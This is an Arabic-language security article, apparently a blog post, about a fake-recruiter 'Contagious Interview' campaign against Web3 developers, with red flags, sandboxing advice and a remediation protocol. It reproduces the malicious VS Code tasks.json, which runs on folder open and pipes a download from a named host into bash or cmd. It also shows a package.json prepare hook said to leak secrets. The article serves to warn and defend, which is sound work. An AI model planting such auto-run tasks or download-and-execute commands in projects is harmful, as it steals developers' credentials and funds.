المقابلة المعدية: كيف يخترق القائمون بالتوظيف المزيفون المطورين

ملخص: موجة جديدة من الهجمات التي ترعاها الدول تضرب كبار المطورين في مجال العملات المشفرة. ينتحل المحتالون صفة مسؤولي التوظيف أو المديرين التقنيين ويجبرون المرشح على فتح تعليمات برمجية خبيثة. تحلل هذه المقالة حالة "Martin Erazo"، واستغلال "tasks.json" في VS Code، و "بروتوكول الحرق" اللازم للبقاء.

إخلاء مسؤولية: يبلغ هذا المقال عن حوادث أمن إلكتروني محددة تتضمن انتحال شخصيات حقيقية. تشير الأسماء "Martin Erazo" و "Ara Vartanian" إلى الشخصيات أو الهويات التي استخدمها المهاجمون. نعتقد أن الأشخاص الحقيقيين الذين يحملون هذه الأسماء هم ضحايا أبرياء لسرقة الهوية وليسوا متورطين في نشاط ضار.

---

---

1. الطعم المثالي: شخصية "Martin Erazo"

يبدأ الأمر برسالة تضغط على جميع النقاط الصحيحة لكبار المطورين:

• الدور: CTO / مهندس رئيسي.
• الميزانية: 6 ملايين دولار تمويل مؤكد.
• التقنية: Web3، الذكاء الاصطناعي، البنية التحتية اللامركزية.

في الهجمات الأخيرة المؤكدة، يتصل مسؤول توظيف باسم "Martin Erazo" عبر LinkedIn. يستخدم الملف الشخصي اسم وصورة مخرج مسرحي حقيقي، لكن تاريخ العمل مزيف ويتغير فجأة إلى "إدارة مشاريع تكنولوجيا المعلومات" في عام 2025 - وهي علامة كلاسيكية على حساب مخترق أو تم شراؤه.

تتحرك عملية الاحتيال بسرعة. يتخطون الفحص القياسي للموارد البشرية وينتقلون مباشرة إلى "مقابلة فنية" مع الإدارة العليا - في هذه الحالة، انتحال صفة CTO حقيقي في الصناعة Ara Vartanian (حالياً في Limit Break).

العلامة الحمراء: يتغير اسم المشروع باستمرار. يبيع مسؤول التوظيف "Betfin" (منصة GameFi)، لكن العرض التقديمي (deck) المرسل يخص "SpaceXView" (مشروع ميتافيرس). هذا التناقض هو دليل على أن المحتالين يعيدون استخدام الأصول بين حملات مختلفة.

2. الفخ: "ألقِ نظرة على كود الـ MVP الخاص بنا"

يدعي "CTO" المزيف أنه بحاجة إلى نظرتك الخبيرة على كود MVP (الحد الأدنى من المنتج القابل للتطبيق) الخاص بهم. يرسلون رابطاً لمستودع GitHub أو ملف ZIP. يضغطون عليك لفتحه أثناء المقابلة أو بعدها مباشرة.

هنا يحدث الهجوم.

يستغلون رغبتك في المساعدة وغرورك. تعتقد أنك تبحث عن أخطاء في مكونات React. في الواقع، الخطأ هو "ميزة" مصممة لسرقة مدخراتك.

3. الاستغلال التقني: برمجيات ضارة بدون نقرات (Zero-Click)

يستخدم المهاجمون ثغرات "zero-click" أو "low-click" التي تستهدف أدوات التطوير. لا يحتاجون منك تشغيل التطبيق. يحتاجون فقط منك أن تفتح المجلد.

الدليل الدامغ: .vscode/tasks.json

في هذه الحالة المحددة، تضمن المستودع ملف .vscode/tasks.json "مفخخاً". يخبر هذا الملف VS Code بكيفية بناء المشروع.

الكود الخبيث:

{
  "tasks": [
    {
      "label": "env",
      "type": "shell",
      "osx": {
        "command": "curl -L 'https://vscodesettingtask.vercel.app/api/settings/mac' | bash"
      },
      "windows": {
        "command": "curl --ssl-no-revoke -L https://vscodesettingtask.vercel.app/api/settings/windows | cmd"
      },
      "runOptions": {
        "runOn": "folderOpen"
      }
    }
  ]
}

• "runOn": "folderOpen": هذا هو المشغل القاتل. في اللحظة التي تفتح فيها المجلد في VS Code، يتم تنفيذ هذه المهمة تلقائياً.
• الحمولة: تستخدم curl لتنزيل برنامج نصي من vscodesettingtask.vercel.app - مضيف برامج ضارة معروف متنكر كواجهة برمجة تطبيقات للإعدادات.
• النتيجة: يعمل البرنامج النصي في الذاكرة ويسرق كلمات مرور Chrome، وملفات تعريف الارتباط للجلسة، ومفاتيح SSH على الفور.

الخطة ب: نصوص package.json

إذا فشل استغلال VS Code، فإنهم يزرعون نصوص npm:

"scripts": {
    "start": "node server/server.js | react-scripts start",
    "prepare": "node server/server.js"
}

يؤدي تشغيل npm install أو npm start إلى تنشيط server/server.js - وهو برنامج نصي محلي C2 (القيادة والتحكم) يقوم بتسريب متغيرات البيئة الخاصة بك (مفاتيح AWS، بذور المحفظة) إلى المهاجم.

4. العلامات الحمراء مقابل العلامات الخضراء

كيف تلاحظ ذلك قبل فوات الأوان؟

إذا كنت مطوراً، يجب أن تسبب "المستودعات الخاصة" أو ملفات ZIP إنذاراً قصوى. تستخدم الشركات الشرعية المستودعات العامة أو مهام الاختبار عبر المنصات القياسية.

تحذير: هذه ليست الطريقة الوحيدة لمهاجمة المطورين. اقرأ عن فخ المتعاون في Discord وكيف تعرض هجمات سلسلة التوريد التبعيات للخطر.

5. بروتوكول الأمان: كيفية إجراء المقابلات بأمان

إذا كنت مطوراً كبيراً، سيتم اصطيادك. تحصين البيئة أمر إلزامي.

البروتوكول 1: بيئة "مؤقتة" (Burner Environment)

لا تستخدم أبداً محطة العمل الرئيسية لاختبارات الكود.

• الآلات الافتراضية: استخدم VirtualBox أو VMWare.
• بيئات التطوير السحابية: استخدم GitHub Codespaces أو Gitpod. إنها مؤقتة ومعزولة عن ملفات محفظتك المحلية.

البروتوكول 2: التدقيق الجنائي

قبل أن تفتح الكود غير المألوف:

1. تحقق من .vscode/tasks.json: ابحث عن runOn: folderOpen.
2. تحقق من package.json: ابحث عن نصوص preinstall أو postinstall المشبوهة.
3. البحث عن كلمات: قم بعمل grep لـ curl، wget، os.homedir()، .ssh، wallet.

البروتوكول 3: تحصين VS Code

قم بتعطيل "Workspace Trust" عالمياً.

• Settings -> Security -> Workspace -> Trust: Startup Prompt -> Always.
• سيجبر هذا VS Code على طلب الإذن قبل تنفيذ أي مهام على مستوى المجلد.

6. العلاج: "بروتوكول الحرق"

إذا فتحت مستودعاً ضاراً (مثل ذلك الذي أرسلته شخصية "Martin Erazo")، فاعتبر نفسك مخترقاً. التراجع عن النظام غير كاف.

1. اقطع الاتصال: اسحب كابل Ethernet فوراً.
2. احرق المحافظ: تسربت مفاتيحك الخاصة. أنشئ محافظ جديدة على جهاز نظيف (هاتف) وانقل الأموال المتبقية. لا تستخدم البذور القديمة أبداً.
3. اقتل الجلسات: سجل الخروج من جميع الأجهزة في Google و GitHub و AWS. ابطل جميع الجلسات النشطة.
4. تدقيق مفاتيح SSH: تحقق من إعدادات GitHub/GitLab. غالباً ما يضيف المهاجمون مفاتيح SSH الخاصة بهم للحفاظ على الوصول عبر الباب الخلفي. احذف أي شيء لا تتعرف عليه.
5. المسح الشامل (Nuke It): امسح القرص وأعد تثبيت نظام التشغيل. هذه هي الطريقة الوحيدة للتأكد بنسبة 100% من زوال الجذور الخفية (rootkits).

الخاتمة

يستخدم احتيال "المقابلة المعدية" خبرتك كسلاح ضدك. إنه يستهدف رغبتك في حل المشكلات. لكن في Web3، جنون العظمة هو فضيلة مهنية. تحقق من كل هوية، ضع كل مستودع في "صندوق رمل" (sandbox)، ولا تثق أبداً بـ "مسؤول توظيف" يستعجلك لكتابة التعليمات البرمجية.